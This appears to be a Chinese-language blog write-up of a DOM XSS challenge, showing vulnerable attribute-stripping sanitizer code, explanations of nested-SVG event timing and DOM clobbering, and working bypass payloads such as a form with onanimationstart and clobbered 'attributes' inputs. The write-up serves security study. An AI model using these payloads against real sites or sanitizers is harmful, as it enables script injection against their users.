XSS-DOM

文章目录

源码

html 复制代码
<script>
 const data = decodeURIComponent(location.hash.substr(1));;
 const root = document.createElement('div');
 root.innerHTML = data;
 
 // 这里模拟了XSS过滤的过程,方法是移除所有属性,sanitizer
 for (let el of root.querySelectorAll('*')) {
  let attrs = [];
  for (let attr of el.attributes) {
   attrs.push(attr.name);
  }
  for (let name of attrs) {
   el.removeAttribute(name);
  }
 }    
  document.body.appendChild(root); 
 
</script>

可以明显的看到这是个DOM XSS,用户的输入会构成一个新div元素的子结点,但在插入body之前会被移除所有的属性。

当尝试输入弹窗警告代码时,没有反应-在执行前属性被删除了。

SVG标签

HTML树型结构

在文档中的script标签会阻塞DOM的构造。

先注释掉过滤代码,此时正常弹窗

payload:<svg><svg src=1 onload=alert(1)></svg>

最内层的svg先触发,然后再到下一层,而且是在DOM树构建完成以前就触发了相关事件。

Dom-Clobbring

采用DOM劫持

html 复制代码
    <img id="x">
    <img name="y">
    <script>
        console.log(x);
        console.log(y);
        console.log(document.x);
        console.log(document.y);
        console.log(window.x);
        console.log(window.y);
    </script>

我们可以通过这种方式去创建或者覆盖 document 或者 window 对象的某些值,但是看起来我们举的例子只是利用标签创建或者覆盖最终得到的也是标签,是一个HTMLElment对象。

但是对于大多数情况来说,我们可能更需要将其转换为一个可控的字符串类型,以便我们进行操作。

tostring

php 复制代码
Object.getOwnPropertyNames(window) 
.filter(p => p.match(/Element$/)) 
.map(p => window[p])  
.filter(p => p && p.prototype && p.prototype.toString !== Object.prototype.toString)

我们可以得到两种标签对象:

HTMLAreaElement ()& HTMLAnchorElement (<a>),利用href属性来进行字符串转换。

html 复制代码
<body>
    <a id="test" href="http://xianoupeng.com">aaa</a>
</body>
<script>
    alert(test)
</script>

引入name属性:

html 复制代码
    <div id=x>
        <a id=y href='www.xianoupeng.com'></a>
    </div>
    <script>
        alert(x.y);
    </script>

使用payload:<style>@keyframes x{}</style><form style="animation-name: x" onanimationstart="alert(1)"><input id=attributes><input id=attributes>解决最初的问题

相关推荐
哆啦A梦158826 分钟前
[前台小程序] 01 项目初始化
前端·vue.js·uni-app
智码看视界1 小时前
老梁聊全栈系列:(阶段一)架构思维与全局观
java·javascript·架构
小周同学@3 小时前
谈谈对this的理解
开发语言·前端·javascript
Wiktok3 小时前
Pyside6加载本地html文件并实现与Javascript进行通信
前端·javascript·html·pyside6
一只小风华~3 小时前
Vue:条件渲染 (Conditional Rendering)
前端·javascript·vue.js·typescript·前端框架
柯南二号3 小时前
【大前端】前端生成二维码
前端·二维码
程序员码歌4 小时前
明年35岁了,如何破局?说说心里话
android·前端·后端
博客zhu虎康4 小时前
React Hooks 报错?一招解决useState问题
前端·javascript·react.js
灰海5 小时前
vue中通过heatmap.js实现热力图(多个热力点)热区展示(带鼠标移入弹窗)
前端·javascript·vue.js·heatmap·heatmapjs
王源骏5 小时前
LayaAir鼠标(手指)控制相机旋转,限制角度
前端